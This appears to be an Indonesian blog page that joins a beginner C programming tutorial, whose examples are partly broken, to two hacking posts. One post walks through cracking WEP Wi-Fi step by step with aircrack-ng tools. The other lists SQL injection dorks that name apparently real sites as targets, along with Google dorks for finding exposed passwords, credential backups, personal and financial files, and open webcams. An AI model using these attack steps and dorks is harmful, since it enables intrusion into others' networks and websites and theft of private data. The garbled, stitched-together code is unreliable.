int tempcalc(int centtemp)
{
int faren;

faren = 32 + (centtemp * 9)/5;
return (faren);
}



note :
ingat , didalam sebuah program terdapat yang namanya variabel local dan grobal, jika kita ingin melempar sebuah varibel kesuatu fungsi maka kita dapat melakukan hal sebagai berikut

model passing by value
----------------------
void fungsi (int tampung){
printf("%d",tampung); /// disini nilai 5 akan tercetak dari operan
dibawah
}

void main(){
int a=5;
cetak(a); ///lempar variabel a ke fungsi cetak diatas
}

gimana jika kita ingin melempar sebuah 2 buah varibel
void fungsi (int tampung, float tampung1){
printf("%d",tampung); /// disini nilai 5 akan tercetak dari operan dibawah
printf("%f",tampung1); /// disini nilai 4.5 akan tercetak dari operan dibawah
}

void main(){
int a=5;
float b=4.5
cetak(a,b); ///lempar variabel a ke fungsi cetak diatas
}

model passing by pointer
------------------------
void testing(int &a){
printf("%d",*a);
}

void main(){
int a=5;
testing(&a);
}

perhatikan tipe data yang anda lemparkan ,,, dia harus di tampung didalam tipe yang sama (jika memungkinkan)

contoh kombinasi :
#include
void header(void);
void square(int number);
void ending(void);

int sum; /* ini global variable */

int main(void)
{
int index; // ini local variabel

header(); /* ini memanggil fungsi header */
for (index = 1 ; index <= 7 ; index++)
square(index); /* ini memanggil fungsi square */
ending(); /* ini memanggil fungsi ending */

return 0;
}

void header(void) /* ini fungsi header */
{
sum = 0; /* inisialisasi dari sum=0 */
printf("ini adalah header dari square program\n\n");
}

void square(int number) /* ini fungsi square */
{
int numsq;

numsq = number * number;
sum += numsq;
printf("nilai square %d adalah %d\n", number, numsq);
}

void ending(void) /* ini fungsi ending */
{
printf("\njumlah dari square adalah %d\n", sum);
}

/* ouputnya
ini adalah header dari square program
nilai square 1 adalah 1
nilai square 2 adalah 4
nilai square 3 adalah 9
nilai square 4 adalah 16
nilai square 5 adalah 25
nilai square 6 adalah 36
nilai square 7 adalah 49
jumlah dari square adalah :140
*/


BAB V: Mengenal Array

Array adalah kumpulan tipe data yang sejenis, kita dapat mendeklarasikan Array kedalam berbagai Dimensi

tampung[5]; // 1 Dimensi
tampung[5][5]; // 2 Dimensi
tampung[5][5][3]; // 3 Dimensi
...
.......
dan seterusnya
cara pendeklarasian :
int tampung[5];
float tampung[5];
char tampung[20];
int tampung[5][5];

angka 5 menjelaskan bawah kita mempunyai 5 data didalam variabel tampung cara pengisian langsung ;

int tampung[5] ={1,2,3,4,5};
float tampung[5] = { 1.0.2.0.3.0.4.0.5.0};
char tampung[5] = {'a','b','c','d','e'};


contoh pemakaian sebagai berikut :
--------------------------------
#include
#include
char my_string[20] = "C hebat!";
int main()
{
int index;
printf("%s\n", my_string);
for (index = 0 ; my_string[index] ; index = index + 1)
printf("%c", my_string[index]);
printf("\n");

for(index = strlen(my_string) ; index > 0 ; index = index - 1)
printf("%c", my_string[index - 1]);
printf("\n");

return 0;
}



contoh lain :

#include
#include

int main()
{
int index;
char stuff[20], *pt;

strcpy(stuff, "This is a neat test.");
pt = stuff;
for(index = 0 ; index < 20 ; index++)
{
printf("A character is ---> %c\n", *pt);
pt++;
}

return 0;
}

#include
#include
int main()
{
int index;
char string1[6], string2[6], string3[6], all_three[18];

strcpy(string1, "one"); //mencopy string "one" kedalam varibel
string1
strcpy(string2, "two"); //idem
strcpy(string3, "three"); // idem

strcpy(all_three, string1);
strcat(all_three, " "); // mengosongkan isi variabel all_tree;

strcat(all_three, string2); // gabungkan isinya
strcat(all_three, " ");
strcat(all_three, string3);

for(index = 0 ; index < 10 ; index = index + 1)
printf("hasil stringnya ---> %s\n", all_three);
return 0;
}


#include
int main()
{
int index, array1[10], array2[10], arrays[10];

for(index = 0 ; index < 10 ; index = index + 1)
{
array1[index] = 2 + 2 * index;
array2[index] = 10 * (index + 1);
}

for(index = 0 ; index < 10 ; index = index + 1)
arrays[index] = array1[index] + array2[index];

for(index = 0 ; index < 10 ; index = index + 1)
printf("%4d %4d + %4d = %4d\n", (index + 1), array1[index],
array2[index], arrays[index]);

return 0;
}

Contoh penggunaan Array 2 Dimensi
--------------------------------
#include
int main()
{
int i, j;
int big[8][8], large[25][12];

for (i = 0 ; i < 8 ; i++)
for (j = 0 ; j < 8 ; j++)
big[i][j] = i * j; /* perkalian tables */

for (i = 0 ; i < 25 ; i++)
for (j = 0 ; j < 12 ; j++)
large[i][j] = i + j; /* penambahan tabel*/

big[2][6] = large[24][10] * 22;
big[2][2] = 5;
big[big[2][2]][big[2][2]] = 177; /* big[5][5] = 177; */

for (i = 0 ; i < 8 ; i++)
{
for (j = 0 ; j < 8 ; j++)
printf("%5d ", big[i][j]);
printf("\n");
}

return 0;
}


BAB VI: Bermain dengan file

untuk bermain dengan file kita harus mendeklarasikannya terlebih dahulu;
contoh;

FILE *ptrfile ; //pointer penunjuk kesebuah file
ptrfile = fopen(outfilename, "w"); /// membuka suatu file ,ditampung disebuah ptrfile
fclose (outfilename); // menutup kembali file yang barusan dibuka

perhatikan tanda "w " , itu disebut dengan modus
modus sangat perlu jika kita bermain dengan file :
r ³ Open for reading only
w ³ Create for writing
³ If a file by that name already exists, it will be overwritten.
a ³ Append; open for writing at end of file, or create for
³ writing if the file does not exist.
r+ ³ Open an existing file for update (reading and writing)
w+ ³ Create a new file for update (reading and writing).
³ If a file by that name already exists, it will be overwritten.
a+ ³ Open for append; open for update at the end of the file, or
³ create if the file does not exist.


contoh :

#include
int main()
{
FILE *infile, *outfile, *printer;
char infilename[25], outfilename[25];
int c;
printf("Enter input file name ----> ");
scanf("%s", infilename);
infile = fopen(infilename, "r");

printf("Enter output file name ---> ");
scanf("%s", outfilename);
outfile = fopen(outfilename, "w");
printer = fopen("PRN", "w");
do
{
c = getc(infile);
if (c != EOF)
{
putchar(c);
putc(c, outfile);
putc(c, printer);
}
} while (c != EOF);
fclose(printer);
fclose(infile);
fclose(outfile);
return 0;
}


contoh lain :
#include
int main()
{
FILE *infile;
char *c, infilename[25], inputline[100];
int line = 1;

printf("Enter input file name ----> ");
scanf("%s", infilename);
infile = fopen(infilename, "r");

printf("%5d", line);
do
{
c=fgets(inputline, 100, infile); /* baca perbaris */
if (c != NULL)
{
printf("%5d %s", line, inputline);
line++;
}
} while (c != NULL);

fclose(infile);

return 0;
}



#include
int main()
{
FILE *fp1;
char oneword[100], filename[25];
char *c;

printf("Enter filename -> ");
scanf("%s", filename); /* baca nama file */
fp1 = fopen(filename, "r");
if (fp1 == NULL)
{
printf("File doesn't exist\n");
exit (1);
}
else
{
do
{
c = fgets(oneword, 100, fp1); /* baca perbaris dari file*/
if (c != NULL)
printf("%s", oneword); /* tampilkan dimonitor */
} while (c != NULL); /* ulangi sampai ketemu NULL
*/
}
fclose(fp1);

return 0;
}



BAB IX: Mengenal struct

struct dalah kumpulan dari berbagai tipe data menjadi satu.
cara pendeklarasian :
struct nama{
int a;
float b ; // berbeda bisa dijadikan dalam 1 struct;
char z;
};

contoh pemakaian sebagai berikut :
--------------------------------
struct nama{
int a;
float b ;
char z;
};

void main() {
nama.a =5;
nama.b =4.0;
nama.z = 'a';

}

contoh lain berupa Array of struct
#include
#include
struct
{
char what[25];
int legs, arms;
} object[6];

int main()
{
int index;

strcpy(object[0].what, "human being");
object[0].legs = 2;
object[0].arms = 2;

strcpy(object[1].what, "dog");
object[1].legs = 4;
object[1].arms = 0;

strcpy(object[2].what, "television set");
object[2].legs = 4;
object[2].arms = 0;

strcpy(object[3].what, "chair");
object[3].legs = 4;
object[3].arms = 2;

strcpy(object[4].what, "centipede");
object[4].legs = 100;
object[4].arms = 0;

strcpy(object[5].what, "spider");
object[5].legs = 6;
object[5].arms = 0;

for(index = 0 ; index < 6 ; index++)
{
printf("A %s has %d legs and %d arms.\n", object[index].what,
object[index].legs, object[index].arms);
}

return 0;
}


contoh kombinasinya , menggunakan pointer:

#include
#include
struct
{
char what[25];
int legs, arms;
} object[6], *point;

int main()
{
int index;

strcpy(object[0].what, "human being");
object[0].legs = 2;
object[0].arms = 2;

strcpy(object[1].what, "dog");
object[1].legs = 4;
object[1].arms = 0;

strcpy(object[2].what, "television set");
object[2].legs = 4;
object[2].arms = 0;

strcpy(object[3].what, "chair");
object[3].legs = 4;
object[3].arms = 2;

strcpy(object[4].what, "centipede");
object[4].legs = 100;
object[4].arms = 0;

strcpy(object[5].what, "spider");
object[5].legs = 6;
object[5].arms = 0;

point = object;
for(index = 0 ; index < 6 ; index++)
{
printf("A %s has %d legs and %d arms.\n", point->what,
point->legs, point->arms);
point++;
}

return 0;
}


#include
#include

struct child
{
char initial;
int age;
int grade;
} *boy, *girl;

int main()
{
boy = (struct child *)malloc(sizeof(struct child));

boy->initial = 'R';
boy->age = 15;
boy->grade = 75;

girl = (struct child *)malloc(sizeof(struct child));

girl->age = boy->age - 1;
girl->grade = 82;
girl->initial = 'H';

printf("%c is %d years old and got a grade of %d\n",
girl->initial, girl->age, girl->grade);

printf("%c is %d years old and got a grade of %d\n",
boy->initial, boy->age, boy->grade);

return 0;
}


#include
#include

struct child
{
char initial;
int age;
int grade;
} *kids[12];

int main()
{
int index;

for (index = 0 ; index < 12 ; index++)
{
kids[index] = (struct child *)malloc(sizeof(struct child));
kids[index]->initial = 'A' + index;
kids[index]->age = 16;
kids[index]->grade = 84;
}

kids[3]->age = kids[5]->age = 17;
kids[2]->grade = kids[6]->grade = 92;
kids[4]->grade = 57;

*kids[10] = *kids[4]; /* Structure assignment */

for (index = 0 ; index < 12 ; index++)
printf("%c is %d years old and got a grade of %d\n",
kids[index]->initial, kids[index]->age,
kids[index]->grade);

return 0;
}



BAB X: Program Penekanan tombol keybord

#include
#include

int main()
{
char input_char;

printf("Hit any key - to stop hit a $\n");
do
{
input_char = getch();
printf("Input character is %c, numerical value is %3d\n",
input_char, input_char);
} while (input_char != '$');

return 0;
}


contoh lain

#include
#include
char storage[80];
int main()
{
char c;
int index = 0;

printf("Tekan sembarang character, keluar dari program tekan X\n");

do
{
c = getch(); /* ambil sebuah character */
if (index < 79) /* batas dari 79 characters */
{
storage[index] = c;
index++;
}
putchar(c); /* tampilkan hit key */
} while (c != 'X');
storage[index] = 0;
printf("%s\n", storage);
printf("\nAkhir dari program.\n");

return 0;
}



Waw... asik juga berkomunikasi dengan komputer dikala suntuk!

ini adalah dasar-dasar pemprograman C. kembangkan lagi sesuai kreatifitas dan imajinasi anda. semoga kita tidak hanya menjadi script kidde terus!, yang tahunya hanya mengcompile dan binggung jika terjadi error :)) .


NOTE : Semua program ini dibuat dan dicompile dengan Borland C 3.1.
Pemberitahuan :
---------------
1. Artikel ini dimaksudkan untuk bahan pelajaran siapa saja yang ingin mengembangkan pengetahuan programming .
2. Dilarang mempublis tanpa mengikutsertakan nama penulis, dengan harapan ingin dianggap Hacker ato apalah ?
3. Jika ada pertanyaan kirimkan ke Email penulis
4. Mohon Maaf jika ada salah kata2 cahyakm11@gmail.com


Report buqs: cahyakm11@gmail.com


Kamis, 16 Juni 2016

Crack WEP,WPA

Video nya ADA di grup: Bergabung? Klik disini !!
Langkah 1:-

Pertama download Backtrack

Langkah 2:-

Burning iso CD dan boot laptop Anda dari drive CD

Langkah 3: -

Pilih opsi boot ketiga (VESA / KDE).

Langkah 4: -

Setelah di BT3, klik kotak hitam kecil di sudut kiri bawah untuk memuat sebuah

"Konsole" jendela.

Langkah 5: -

Ketik perintah berikut

airmon-ng

Note down the interface name. Dalam contoh wifi0 ini

Langkah 6: -

airmon-ng berhenti wifi0

Langkah 7: -

ifconfig wifi0 bawah

Langkah 8: -

macchanger --mac 00: 11: 22: 33: 44: 66 wifi0

Langkah 9: -

airmon-ng start wifi0

Langkah 10: -

airodump-ng wifi0

Ini akan mulai mengisi jaringan Wifi. Tekan Ctrl + C untuk menghentikan.

Memeriksa jaringan dengan enkripsi WEP.

Notedown BSSID, CH dan ESSID di suatu tempat di notepad / Text pad

Perhatikan bahwa jika BSSID yang sama tersedia di bagian kedua dengan STATION terkait dengan itu,

berarti Anda seseorang sedang mengakses jaringan itu dan tugas kita akan sedikit lebih mudah.

Jika tidak dari jangan khawatir kita masih akan Crack itu.

Langkah 11: -

airodump-ng -c (channel) -w (nama file)

Menggantikan

(Channel) dengan CH yang u sudah n

(Nama file) dengan nama pilihan Anda

(BSSID) dengan BSSID yang u sudah dicatat

--bssid (BSSID) wifi0

Catatan itu

Tinggalkan konsol ini seperti itu dan mulai konsole baru

Langkah 12: -

aireplay-ng -1 0 -a (bssid) -h 00: 11: 22: 33: 44: 66 wifi0

Jika Anda tidak mendapatkan Asosiasi mesage Sukses kemudian terus mencoba sampai

Anda mendapat kesuksesan.

Langkah 13: -

aireplay-ng -3 -b (BSSID) -h 00: 11: 22: 33: 44: 66 wifi0

Nah jika Anda tidak melihat ARP ACK dan mengirim paket tidak meningkat atau masih 0

dari itu berarti tidak ada 1 adalah

mengakses yang network.But jangan khawatir Anda pergi langkah opsional,

Tinggalkan konsol ini seperti itu dan mulai k baru

Langkah 14: -

aireplay-ng -2 p 0841 -c FF: FF: FF: FF: FF: FF

konsole

Pesan dari terus mencoba sampai Anda sukses

mendapat langkah opsional

konsole

-b (BSSID) -h 00: 11: 22: 33: 44: 66 wfi0

Tekan y dan masukkan

Sekarang Anda akan melihat bahwa ARP dan ACK paket di konsol 2 meningkat cepat

Menjaga konsol ini seperti itu dan mulai 4 konsol.

Langkah 15: -

aircrack-ng -b (BSSID) (nama file) -

Tinggal menunggu ... ..Backtrack akan melakukan sisa pekerjaan.



Selesai .. !!

Thanks to Milw0rm Sry Temen-temen :v Ane cuma bisa bantu dikit :v

Minggu, 12 Juni 2016

Deface Sql inject Manual

Update Imp. Dorks.
Dork : "inurl:dettaglio.php?id="

Exploit :
www.victim.com/sito/dettaglio.php?id=[SQL]

Example :
http://www.cicloposse.com/dettaglio.php?id=61'
----------------------------------------------------------------------------------------------------------------
Dork: inurl:prodotto.php?id)

Exploit:
www.victim.com/prodotto.php?id=[SQL]

Example:http://www.poderimorini.com/en/prodotto.php?id=14'




sql injection dorks

allinurl: \”index php go buy\”
allinurl: \”index.php?go=sell\”
allinurl: \”index php go linkdir\”
allinurl: \”index.php?go=resource_center\”
allinurl: \”resource_center.html\”
allinurl: \”index.php?go=properties\”
allinurl: \”index.php?go=register\”

Error message queries
“A syntax error has occurred”filetype:ihtml
Informix database errors, potentially containing function names, filenames, file structure information, pieces of SQL code and passwords
“Access denied for user” “Using password”
authorisation errors, potentially containing user names, function names, file structure information and pieces of SQL code
“The script whose uid is ” “is not allowed to access”

access-related PHP errors, potentially containing filenames, function names and file structure information
“ORA-00921: unexpected end of SQL command”
Oracle database errors, potentially containing filenames, function names and file structure information
“error found handling the request” cocoon filetype:xml
Cocoon errors, potentially containing Cocoon version information, filenames, function names and file structure information
“Invision Power Board Database Error”

Invision Power Board bulletin board errors, potentially containing function names, filenames, file structure information and piece of SQL code
“Warning: mysql _ query()” “invalid query”
MySQL database errors, potentially containing user names, function names, filenames and file structure information
“Error Message : Error loading required libraries.”

CGI script errors, potentially containing information about operating system and program versions, user names, filenames and file structure information
“#mysql dump” filetype:sql
MySQL database errors, potentially containing information about database structure and contents
Dork for locating passwords
http://*:*@www” site
passwords for site, stored as the string “http://username:password@www…”
filetype:bak inurl:”htaccess|passwd|shadow|ht users”
file backups, potentially containing user names and passwords
filetype:mdb inurl:”account|users|admin|admin istrators|passwd|password”
mdb files, potentially containing password information
intitle:”Index of” pwd.db
pwd.db files, potentially containing user names and encrypted passwords
inurl:admin inurl:backup intitle:index.of
directories whose names contain the words admin and backup
“Index of/” “Parent Directory” “WS _ FTP.ini”
filetype:ini WS _ FTP PWD
WS_FTP configuration files, potentially containing FTP server access passwords
ext:pwd inurl:(service|authors|administrators |users) “# -FrontPage-”
files containing Microsoft FrontPage passwords
filetype:sql (“passwd values ****” | “password values ****” | “pass values ****” )
files containing SQL code and passwords inserted into a database
intitle:index.of trillian.ini
configuration files for the Trillian IM
eggdrop filetype:user

user configuration files for the Eggdrop ircbot
filetype:conf slapd.conf
configuration files for OpenLDAP
inurl:”wvdial.conf” intext:”password”
configuration files for WV Dial
ext:ini eudora.ini
configuration files for the Eudora mail client
filetype:mdb inurl:users.mdb
Microsoft Access files, potentially containing user account information
Searching for personal data and confidential documents
filetype:xls inurl:”email.xls”
email.xls files, potentially containing contact information
“phone * * *” “address *” “e-mail” intitle: “curriculum vitae”
CVs
“not for distribution”

confidential documents containing the confidential clause
buddylist.blt
AIM contacts list
intitle:index.of mystuff.xml
Trillian IM contacts list
filetype:ctt “msn”
MSN contacts list
filetype:QDF

QDF database files for the Quicken financial application
intitle:index.of finances.xls
finances.xls files, potentially containing information on bank accounts, financial summaries and credit card numbers
intitle:”Index Of” -inurl:maillog maillog size
maillog files, potentially containing e-mail
Network Vulnerability Assessment Report”
“Host Vulnerability Summary Report”
filetype:pdf “Assessment Report”
“This file was generated by Nessus”
reports for network security scans, penetration tests etc
dork for locating network devices
“Copyright (c) Tektronix, Inc.” “printer status”
PhaserLink printers
inurl:”printer/main.html” intext:”settings”
Brother HL printers
intitle:”Dell Laser Printer” ews
Dell printers with EWS technology
intext:centreware inurl:status
Xerox Phaser 4500/6250/8200/8400 printers
inurl:hp/device/this.LCDispatcher
HP printers
intitle:liveapplet inurl:LvAppl
Canon Webview webcams
intitle:”EvoCam” inurl:”webcam.html”
Evocam webcams
inurl:”ViewerFrame?Mode=”

Panasonic Network Camera webcams
(intext:”MOBOTIX M1? | intext:”MOBOTIX M10?) intext:”Open Menu” Shift-Reload
Mobotix webcams
inurl:indexFrame.shtml Axis
Axis webcams
intitle:”my webcamXP server!” inurl:”:8080?
webcams accessible via WebcamXP Server
allintitle:Brains, Corp.
camera webcams accessible via mmEye
intitle:”active webcam page”


Sumber :Millw0rm